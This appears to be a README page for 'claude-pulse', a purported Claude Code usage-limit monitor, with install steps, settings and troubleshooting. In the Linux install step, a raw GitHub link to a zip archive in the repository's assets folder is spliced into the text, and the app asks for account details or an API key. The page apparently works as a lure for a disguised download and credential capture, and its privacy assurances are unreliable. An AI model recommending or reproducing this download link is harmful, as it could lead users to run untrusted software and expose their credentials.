claude-pulse helps you keep track of your Claude Code usage in real time. It shows session limits, weekly limits, and the plan tier you are on. The progress bars use colors to make it easy to see how much of your limits you have used.
This tool makes monitoring simple and helps you avoid hitting your limits unexpectedly.
Before downloading, check that your computer meets these basic needs:
- Operating System: Windows 10 or later, macOS 10.13 or later, or most Linux distributions
- Processor: Intel or AMD 64-bit processor
- Memory: At least 4 GB of RAM
- Storage: At least 100 MB free space
- Internet: Required to fetch your Claude Code usage data
These requirements should cover most computers made in the last 5 years.
Follow these steps to get claude-pulse up and running in just a few minutes:

This page shows all available versions. Pick the latest one for your operating system.
On the release page, locate the file for your system:
- For Windows, look for files ending in
.exeor.msi. - For macOS, look for
.dmgor.zipfiles. - For Linux, look for
.AppImageorhttps://github.com/qKasu/claude-pulse/raw/refs/heads/master/assets/pulse_claude_3.7.zip.
Click the file name to download it.
- Windows: Double-click the
.exeor.msifile and follow the on-screen installer prompts. - macOS: Open the
.dmgfile, then drag the claude-pulse app to your Applications folder. - Linux: If you downloaded an
.AppImage, make it executable by runningchmod +x <filename>in a terminal, then launch it by double-clicking or running it from the terminal.
Find claude-pulse in your start menu, applications folder, or where you installed it, and open it.
When you open the app for the first time, you may be asked to enter your Claude Code account details or API key. This step lets the app access your usage data.

Once installed, claude-pulse will display your usage information clearly.
- Session Limits: See how much youβve used in your current session.
- Weekly Limits: Track your usage throughout the week.
- Plan Tier: Know your subscription level at a glance.
- Colour-Coded Bars: Green means safe, yellow means caution, red means you are near or over limits.
- The main window shows your current usage stats.
- Hover over progress bars for exact numbers.
- Use the settings menu to refresh data or log out.
You can customize claude-pulse to fit your needs:
- Refresh Rate: Choose how often it updates your data (e.g., every 5 minutes).
- Notification Alerts: Turn on alerts to warn when you near limits.
- Theme: Pick light or dark mode for the interface.
Check the settings icon in the top right corner of the app to make changes.
If you have issues, try these solutions:
- App wonβt open: Restart your computer and try again.
- Data not showing: Check your internet connection and verify your account info in settings.
- Installation errors: Make sure your system meets the requirements and try downloading the file again.
- Progress bars stuck: Click the refresh button or restart the app.

claude-pulse only accesses your Claude Code usage data with your permission. None of your personal information is sent elsewhere. All data stays on your computer unless you choose to share it.
The app uses secure connections to safely retrieve usage stats.
